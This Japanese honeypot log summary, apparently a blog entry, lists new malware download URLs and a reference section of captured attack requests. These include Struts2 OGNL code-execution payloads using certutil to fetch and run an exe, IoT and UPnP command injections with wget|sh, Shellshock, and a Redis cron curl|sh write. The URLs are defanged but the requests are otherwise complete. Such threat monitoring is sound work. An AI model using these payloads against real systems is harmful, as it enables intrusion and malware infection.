
【ハニーポット簡易分析】Honeytrap簡易分析(220-221日目:3/21-3/22)

Honeytrap簡易分析(220-221日目:3/21-3/22)となります。
※80ポートは除いています。

f:id:one-chick-sec:20190323153750p:plain

特定の時間帯にスパイクしている通信はSMB関連の通信であり、新規の脆弱性を狙ったものではありませんでした。

◾️ペイロード
.....SMBr.....S...................@..b..PC NETWORK PROGRAM 1.0..LANMAN1.0..Windows for Workgroups 3.1a..LM1.2X002..LANMAN2.1..NT LM 0.12.


<新規マルウェア>

ポート マルウェアダウンロード先 VT
8000 hxxp://185[.]244[.]25[.]114/kalon[.]arm5

VirusTotal

8000 hxxp://209[.]141[.]40[.]213/avtech

VirusTotal

10000 hxxp://192[.]192[.]78[.]216:9090/scan/inux[.]php

VirusTotal

52869 hxxp://104[.]248[.]23[.]140/tenshimips

VirusTotal


IoT関連では Gafgyt 亜種のダウンロードが多い傾向でした。一方でポート6379（Redis）宛ての通信も増加してきていました。以下のペイロードは cron 形式の行（curl ... | sh）を SET で書き込むものであり、定期実行による感染を狙ったものと見られます。
◾️ペイロード
*3..$3..SET..$5..Back1..$59....* * * * * curl -fsSL hxxp://w[.]3ei[.]xyz:43768/lll.sh | sh....

 

以上となります。

<参考:マルウェアダウンロードに使われたペイロード>

GET /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:81/FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:81[.][.][.][.]
GET /index[.]action HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Content-Type: %{(#nike='multipart/form-data')[.](#dm=@ognl[.]OgnlContext@DEFAULT_MEMBER_ACCESS)[.](#_memberAccess?(#_memberAccess=#dm):*1[.](#ognlUtil[.]getExcludedPackageNames()[.]clear())[.](#ognlUtil[.]getExcludedClasses()[.]clear())[.](#context[.]setMemberAccess(#dm))))[.](#cmd='cmd[.]exe /c certutil[.]exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/download[.]exe C:/Windows/temp/fexbxidrwkqkbyt9335[.]exe & cmd[.]exe /c C:/Windows/temp/fexbxidrwkqkbyt9335[.]exe')[.](#iswin=(@java[.]lang[.]System@getProperty('os[.]name')[.]toLowerCase()[.]contains('win')))[.](#cmds=(#iswin?{'cmd[.]exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))[.](#p=new java[.]lang[.]ProcessBuilder(#cmds))[.](#p[.]redirectErrorStream(true))[.](#process=#p[.]start())[.](#ros=(@org[.]apache[.]struts2[.]ServletActionContext@getResponse()[.]getOutputStream()))[.](@org[.]apache[.]commons[.]io[.]IOUtils@copy(#process[.]getInputStream(),#ros))[.](#ros[.]flush())}[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:82/index[.]action[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:82[.][.][.][.]
GET /index[.]do HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Content-Type: %{(#nike='multipart/form-data')[.](#dm=@ognl[.]OgnlContext@DEFAULT_MEMBER_ACCESS)[.](#_memberAccess?(#_memberAccess=#dm):*2[.](#ognlUtil[.]getExcludedPackageNames()[.]clear())[.](#ognlUtil[.]getExcludedClasses()[.]clear())[.](#context[.]setMemberAccess(#dm))))[.](#cmd='cmd[.]exe /c certutil[.]exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/download[.]exe C:/Windows/temp/fexbxidrwkqkbyt9335[.]exe & cmd[.]exe /c C:/Windows/temp/fexbxidrwkqkbyt9335[.]exe')[.](#iswin=(@java[.]lang[.]System@getProperty('os[.]name')[.]toLowerCase()[.]contains('win')))[.](#cmds=(#iswin?{'cmd[.]exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))[.](#p=new java[.]lang[.]ProcessBuilder(#cmds))[.](#p[.]redirectErrorStream(true))[.](#process=#p[.]start())[.](#ros=(@org[.]apache[.]struts2[.]ServletActionContext@getResponse()[.]getOutputStream()))[.](@org[.]apache[.]commons[.]io[.]IOUtils@copy(#process[.]getInputStream(),#ros))[.](#ros[.]flush())}[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:82/index[.]do[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:82[.][.][.][.]
GET /struts2-rest-showcase/orders[.]xhtml HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Content-Type: %{(#nike='multipart/form-data')[.](#dm=@ognl[.]OgnlContext@DEFAULT_MEMBER_ACCESS)[.](#_memberAccess?(#_memberAccess=#dm):*3[.](#ognlUtil[.]getExcludedPackageNames()[.]clear())[.](#ognlUtil[.]getExcludedClasses()[.]clear())[.](#context[.]setMemberAccess(#dm))))[.](#cmd='cmd[.]exe /c certutil[.]exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/download[.]exe C:/Windows/temp/fexbxidrwkqkbyt9335[.]exe & cmd[.]exe /c C:/Windows/temp/fexbxidrwkqkbyt9335[.]exe')[.](#iswin=(@java[.]lang[.]System@getProperty('os[.]name')[.]toLowerCase()[.]contains('win')))[.](#cmds=(#iswin?{'cmd[.]exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))[.](#p=new java[.]lang[.]ProcessBuilder(#cmds))[.](#p[.]redirectErrorStream(true))[.](#process=#p[.]start())[.](#ros=(@org[.]apache[.]struts2[.]ServletActionContext@getResponse()[.]getOutputStream()))[.](@org[.]apache[.]commons[.]io[.]IOUtils@copy(#process[.]getInputStream(),#ros))[.](#ros[.]flush())}[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:82/struts2-rest-showcase/orders[.]xhtml[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:82[.][.][.][.]
GET /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:90/FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:90[.][.][.][.]
*3[.][.]$3[.][.]SET[.][.]$5[.][.]Back1[.][.]$59[.][.][.][.]* * * * * curl -fsSL hxxp://w[.]3ei[.]xyz:43768/lll[.]sh | sh[.][.][.][.]
GET /cgi-bin/nobody/Search[.]cgi?action=cgi_query&ip=google[.]com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account[.]User1[.]Password>$(cd /tmp; wget hxxp://xxx[.]xxx[.]xxx[.]xxx/kalon[.]arm5;chmod 777 kalon[.]arm5;sh kalon[.]arm5)&password=admin HTTP/1[.]1[.][.]User-Agent: Sefa[.][.][.][.]
GET /cgi-bin/nobody/Search[.]cgi?action=cgi_query&ip=google[.]com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account[.]User1[.]Password>$(cd /tmp; wget hxxp://xxx[.]xxx[.]xxx[.]xxx/kalon[.]arm5;chmod 777 kalon[.]arm5;sh kalon[.]arm5)&password=admin HTTP/1[.]1[.][.]User-Agent: Sefa[.][.][.][.]
GET /cgi-bin/nobody/Search[.]cgi?action=cgi_query&ip=google[.]com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account[.]User1[.]Password>$(cd /tmp; wget hxxp://xxx[.]xxx[.]xxx[.]xxx/avtech -O niXd; chmod 777 niXd; sh niXd)&password=admin HTTP/1[.]1[.][.]User-Agent: Sefa[.][.]Accept: text/html,application/xhtml xml,application/xml;q=0[.]9,*/*;q=0[.]8[.][.]Accept-Language: en-GB,en;q=0[.]5[.][.]Accept-Encoding: gzip, deflate[.][.]Connection: close[.][.][.][.]
GET /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:8008/FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:8008[.][.][.][.]
GET /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:8081/FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:8081[.][.][.][.]
POST /login[.]gch HTTP/1[.]1[.][.]User-Agent: NoPublicity <3[.][.]Content-Length: 420[.][.]Connection: keep-alive[.][.]Accept: */*[.][.][.][.]Frm_Logintoken=4&Username=root&Password=W!n0&oO7[.]POST /manager_dev_ping_t[.]gch HTTP/1[.]1[.][.]User-Agent: NoPublicity <3[.][.]Content-Length: 420[.][.]Connection: keep-alive[.][.]Accept: */*[.][.][.][.]&Host=;$(cd /tmp; rm -rf *; wget hxxp://xxx[.]xxx[.]xxx[.]xxx/bins/apep[.]mips; chmod 777 apep[.]mips; [.]/apep[.]mips selfrep[.]zte)&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submitPOST /getpage[.]gch?pid=1001&logout=1 HTTP/1[.]1[.][.]User-Agent: NoPublicity <3[.][.]Content-Length: 420[.][.]Connection: keep-alive[.][.]Accept: */*[.][.][.][.]broke bitches
GET /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:8090/FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:8090[.][.][.][.]
GET /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:8090[.][.]Accept: */*[.][.][.][.]
HEAD /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:8090[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 7[.]0; Windows NT 5[.]1; TencentTraveler 4[.]0)[.][.]Accept: */*[.][.][.][.]
GET /cgi-bin/authLogin[.]cgi HTTP/1[.]1[.]Host: xxx[.]xxx[.]xxx[.]xxx[.]User-Agent: () { :; };  /bin/rm -rf /tmp/S0[.]php && /bin/mkdir -p /share/HDB_DATA/[.][.][.]/ && /usr/bin/wget -c   -t1 -T2 hxxp://xxx[.]xxx[.]xxx[.]xxx:9090/scan/inux[.]php -O /tmp/pig && wget -c   -t1 -T2 hxxp://xxx[.]xxx[.]xxx[.]xxx:9090/scan/inux[.]php -O  /tmp/pig  && rm /tmp/pig  ;0<&1 2>&1 [.][.][.] &  [.][.][.]

POST /picsdesc[.]xml HTTP/1[.]1[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:52869[.][.]SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping[.][.]Content-Length: 632[.][.]Accept-Encoding: gzip, deflate, compress[.][.]Accept: */*[.][.]User-Agent: python-requests/2[.]2[.]1 CPython/2[.]7[.]6 Linux/3[.]13[.]0-164-generic[.][.][.][.]<?xml version="1[.]0" ?><s:Envelope xmlns:s="hxxp://schemas[.]xmlsoap[.]org/soap/envelope/" s:encodingStyle="hxxp://schemas[.]xmlsoap[.]org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; wget hxxp://xxx[.]xxx[.]xxx[.]xxx/tenshimips -O t`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>

 

*1:#container=#context['com[.]opensymphony[.]xwork2[.]ActionContext[.]container'])[.](#ognlUtil=#container[.]getInstance(@com[.]opensymphony[.]xwork2[.]ognl[.]OgnlUtil@class

*2:#container=#context['com[.]opensymphony[.]xwork2[.]ActionContext[.]container'])[.](#ognlUtil=#container[.]getInstance(@com[.]opensymphony[.]xwork2[.]ognl[.]OgnlUtil@class

*3:#container=#context['com[.]opensymphony[.]xwork2[.]ActionContext[.]container'])[.](#ognlUtil=#container[.]getInstance(@com[.]opensymphony[.]xwork2[.]ognl[.]OgnlUtil@class